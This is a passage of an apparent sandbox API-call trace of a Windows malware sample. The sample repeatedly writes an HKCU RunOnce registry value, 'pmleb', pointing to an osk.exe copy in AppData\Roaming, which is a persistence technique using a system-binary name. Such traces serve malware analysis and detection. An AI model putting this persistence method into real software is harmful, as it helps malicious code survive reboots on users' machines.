lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.620] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.620] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.620] RegCloseKey (hKey=0x280) returned 0x0 [0077.620] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.620] GetCurrentThreadId () returned 0x544 [0077.620] GetCurrentThreadId () returned 0x544 [0077.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.621] 
SetTimer (hWnd=0x20280, nIDEvent=0x200c, uElapse=0xa, lpTimerFunc=0x0) returned 0x200c [0077.621] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.631] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.631] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.631] KillTimer (hWnd=0x20280, uIDEvent=0x200c) returned 1 [0077.631] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.631] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.632] IUnknown:Release (This=0x787518) returned 0x1 [0077.632] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.632] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.632] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, 
wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.632] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.632] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0077.632] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.633] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xe [0077.633] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.633] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0077.633] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.633] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.633] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.634] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.634] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.634] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.634] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.634] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.634] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.634] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.634] RegCloseKey (hKey=0x280) returned 0x0 [0077.634] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.635] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.635] SetTimer (hWnd=0x20280, nIDEvent=0x200d, uElapse=0xa, lpTimerFunc=0x0) returned 0x200d [0077.635] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.647] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.647] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.647] KillTimer (hWnd=0x20280, uIDEvent=0x200d) returned 1 [0077.647] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.647] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.647] IUnknown:Release (This=0x787518) returned 0x1 [0077.647] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.648] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.648] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.648] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.648] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0077.648] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0077.648] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xf [0077.648] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.649] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0077.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.649] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.649] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.649] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.649] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 
| out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.649] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.650] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.650] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.650] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.650] RegCloseKey (hKey=0x280) returned 0x0 [0077.650] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.650] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.650] SetTimer (hWnd=0x20280, nIDEvent=0x200e, uElapse=0xa, lpTimerFunc=0x0) returned 0x200e [0077.650] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.662] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.662] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.662] KillTimer (hWnd=0x20280, uIDEvent=0x200e) returned 1 [0077.663] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.663] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.663] IUnknown:Release (This=0x787518) returned 0x1 [0077.663] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.663] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.663] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.664] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.664] 
FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.664] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0077.664] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.664] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x10 [0077.664] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.665] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0077.665] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.665] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.665] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.665] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.665] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.665] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.665] _mbsnbcmp 
